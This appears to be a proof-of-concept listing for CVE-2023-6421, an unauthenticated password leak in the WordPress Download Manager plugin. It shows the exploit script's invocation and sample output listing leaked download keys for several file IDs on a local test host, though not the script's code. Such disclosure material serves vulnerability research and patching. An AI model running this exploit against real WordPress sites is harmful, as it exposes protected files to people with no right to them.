CVE-2023-6421 PoC — WordPress Plugin Download Manager 安全漏洞

Source

Associated Vulnerability

Description

Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak

Readme

# CVE-2023-6421
Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak

# Description
The plugin does not protect file download's passwords, leaking it upon receiving an invalid one

# POC
```
python3 CVE-2023-6421.py https://kubernetes.docker.internal
No link generated for ID 1.
No link generated for ID 2.
Response for ID 3: https://kubernetes.docker.internal/?page_id=3&wpdmdl=3&_wpdmkey=6706819b904ce
No link generated for ID 4.
No link generated for ID 5.
No link generated for ID 6.
No link generated for ID 7.
No link generated for ID 8.
Response for ID 9: https://kubernetes.docker.internal/?wpdmdl=9&_wpdmkey=6706819f1b1f6
Response for ID 10: https://kubernetes.docker.internal/1-1/?wpdmdl=10&_wpdmkey=6706819fa0654
```

File Snapshot

 [4.0K]  /data/pocs/f119c3b95396020ab476fc4788ad4a21bdb2fa27
├── [2.4K]  CVE-2023-6421.py
└── [ 760]  README.md

0 directories, 2 files

Remarks